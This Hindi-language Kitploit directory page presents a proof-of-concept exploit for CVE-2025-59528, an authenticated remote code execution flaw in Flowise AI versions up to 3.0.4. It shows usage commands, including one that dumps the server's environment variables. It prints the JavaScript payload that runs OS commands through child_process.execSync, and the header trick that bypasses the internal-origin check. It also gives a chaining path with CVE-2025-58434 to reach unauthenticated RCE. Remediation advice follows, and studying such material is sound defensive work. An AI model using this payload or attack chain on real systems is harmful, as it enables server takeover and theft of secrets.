Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Flowise-RCE-CVE-2025-59528 — Flowise AI संस्करण ≤ 3.0.4 के लिए प्रमाणित दूरस्थ कोड निष्पादन (RCE) शोषण। /api/v1/node-load-method/customMCP एंडपॉइंट में भेद्यता का लाभ उठाकर Node.js child_process.execSync() के माध्यम से मनमाने सिस्टम कमांड निष्पादित करता है। पूर्ण PoC स्क्रिप्ट और उपचार चरण शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/r3nsi15/flowise-rce-cve-2025-59528
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubr3nsi15/flowise-rce-cve-2025-59528

Flowise-RCE-CVE-2025-59528

Flowise AI संस्करण ≤ 3.0.4 के लिए प्रमाणित दूरस्थ कोड निष्पादन (RCE) शोषण। /api/v1/node-load-method/customMCP एंडपॉइंट में भेद्यता का लाभ उठाकर Node.js child_process.execSync() के माध्यम से मनमाने सिस्टम कमांड निष्पादित करता है। पूर्ण PoC स्क्रिप्ट और उपचार चरण शामिल हैं।

रिपॉजिटरी देखें
114 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-59528 — Flowise AI प्रमाणित दूरस्थ कोड निष्पादन (RCE)

अवलोकन

CVE ID: CVE-2025-59528
प्रभावित सॉफ्टवेयर: Flowise AI
कमजोर संस्करण: <= 3.0.4
सुधारित संस्करण: 3.0.5 और बाद के
गंभीरता: क्रिटिकल
लेखक: r3nsi15
तिथि: 2025

विवरण

Flowise AI के संस्करण 3.0.4 तक (3.0.4 सहित) एक प्रमाणित उपयोगकर्ता को /api/v1/node-load-method/customMCP एंडपॉइंट पर एक तैयार किया गया JavaScript पेलोड भेजकर होस्ट सर्वर पर दूरस्थ कोड निष्पादन (RCE) प्राप्त करने की अनुमति देते हैं।

customMCP नोड की लोड विधि उपयोगकर्ता-नियंत्रित इनपुट स्वीकार करती है जिसे सर्वर-साइड JavaScript के रूप में मूल्यांकित किया जाता है, बिना पर्याप्त सैनिटाइज़ेशन या सैंडबॉक्सिंग के। Node.js के child_process.execSync का लाभ उठाने वाले पेलोड को इंजेक्ट करके, एक हमलावर Flowise सर्वर प्रक्रिया के विशेषाधिकारों के साथ मनमाना ऑपरेटिंग सिस्टम कमांड चला सकता है।

एंडपॉइंट को x-request-from: internal हेडर की उपस्थिति की भी आवश्यकता होती है।

प्रभावित एंडपॉइंट

एंडपॉइंटविधिप्रमाणीकरण आवश्यकउद्देश्य
/api/v1/auth/loginPOSTनहींप्रमाणित करें और सत्र प्राप्त करें
/api/v1/node-load-method/customMCPPOSTहाँ (सत्र कुकी)कमजोर नोड लोड विधि एंडपॉइंट

प्रमाण अवधारणा का

फ़ाइल: CVE-2025-59528_POC.py

आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी
  • लक्ष्य Flowise इंस्टेंस पर किसी भी उपयोगकर्ता खाते के लिए मान्य क्रेडेंशियल्स
root@kitploit:~
pip install requests

उपयोग

root@kitploit:~
python3 CVE-2025-59528_POC.py -e <email> -i <target_url> -p <password> -c <command>

तर्क

फ़्लैगलंबा रूपआवश्यकविवरण
-e--emailहाँप्रमाणित उपयोगकर्ता का ईमेल पता
-i--urlहाँFlowise इंस्टेंस का आधार URL
-p--passwordहाँप्रमाणित उपयोगकर्ता का पासवर्ड
-c--cmdहाँसर्वर पर निष्पादित करने के लिए OS कमांड

उदाहरण

कोड निष्पादन सत्यापित करें:

root@kitploit:~
python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "id"

सर्वर पर्यावरण चर प्राप्त करें:

root@kitploit:~
python3 CVE-2025-59528_POC.py -e [email protected] -i https://flowise.example.com -p MyP@ss -c "env"

अपेक्षित आउटपुट

root@kitploit:~
[+] Logged in
[+] Exploit sent
[+] Status: 200

पेलोड विश्लेषण

यह शोषण निम्नलिखित JavaScript अभिव्यक्ति को mcpServerConfig फ़ील्ड में इंजेक्ट करता है:

root@kitploit:~
({x:(function(){
    const cp = process.mainModule.require('child_process');
    cp.execSync('<command>');
    return 1;
})()})
  • process.mainModule.require('child_process') — Node.js के अंतर्निहित प्रक्रिया निष्पादन मॉड्यूल को लोड करता है।
  • execSync('<command>') — हमलावर द्वारा दिए गए OS कमांड को सिंक्रोनस रूप से चलाता है।
  • पूरी अभिव्यक्ति को ऑब्जेक्ट लिटरल में लपेटा गया है ताकि यह सर्वर के JavaScript संदर्भ में साफ-सुथरे ढंग से मूल्यांकित हो।

x-request-from: internal हेडर को भी अनुरोध में जोड़ा जाता है ताकि आंतरिक मूल जांच को पास किया जा सके जो अन्यथा कॉल को ब्लॉक कर देगा।

मूल कारण

customMCP एंडपॉइंट उपयोगकर्ता द्वारा आपूर्ति किए गए इनपुट को सीधे सर्वर पर JavaScript मूल्यांकन संदर्भ में पास करता है, बिना सैनिटाइज़ेशन या सैंडबॉक्सिंग के। Node.js के मुख्य मॉड्यूल (विशेष रूप से child_process) तक process.mainModule.require के माध्यम से अप्रतिबंधित पहुंच के साथ, यह एक सरलता से शोषणीय RCE वेक्टर बनाता है। x-request-from हेडर जांच कोई सार्थक सुरक्षा सीमा प्रदान नहीं करता क्योंकि इसे किसी विश्वसनीय स्रोत के विरुद्ध मान्य नहीं किया जाता है।

CVE-2025-58434 के साथ श्रृंखलन

ये दो कमजोरियां संस्करण <= 3.0.4 चलाने वाले Flowise इंस्टेंस के खिलाफ एक अप्रमाणित RCE हमला पथ के लिए श्रृंखलित की जा सकती हैं:

  1. किसी ज्ञात खाते का पासवर्ड रीसेट करने के लिए CVE-2025-58434 का उपयोग करें (कोई पूर्व प्रमाणीकरण आवश्यक नहीं)।
  2. नवनिर्धारित क्रेडेंशियल्स के साथ लॉग इन करें।
  3. सर्वर पर मनमाना OS कमांड निष्पादित करने के लिए CVE-2025-59528 का उपयोग करें।

उपचार

  • अपग्रेड करें Flowise AI 3.0.5 या बाद के संस्करण पर, जो कमजोर मूल्यांकन पथ को हटा देता है या उचित रूप से सैंडबॉक्स करता है।
  • सर्वर-साइड संदर्भ में उपयोगकर्ता-नियंत्रित स्ट्रिंग को कभी भी कोड के रूप में मूल्यांकित न करें।
  • खतरनाक Node.js मॉड्यूल (child_process, fs, आदि) तक पहुंच को उचित सैंडबॉक्स (जैसे, vm2, पृथक संदर्भ, या process.mainModule पहुंच हटाने) के माध्यम से प्रतिबंधित करें।
  • x-request-from हेडर को एक साधारण स्ट्रिंग जांच के बजाय सर्वर-साइड तंत्र के माध्यम से मान्य और प्रमाणित करें।
  • Flowise सर्वर प्रक्रिया पर न्यूनतम विशेषाधिकार के सिद्धांत को लागू करें।

अस्वीकरण

यह प्रमाण अवधारणा केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान की गई है। स्पष्ट लिखित अनुमति के बिना सिस्टम के खिलाफ इस स्क्रिप्ट का उपयोग अवैध और अनैतिक है। लेखक और योगदानकर्ता दुरुपयोग के लिए कोई दायित्व नहीं मानते हैं।

टूल डाउनलोड करें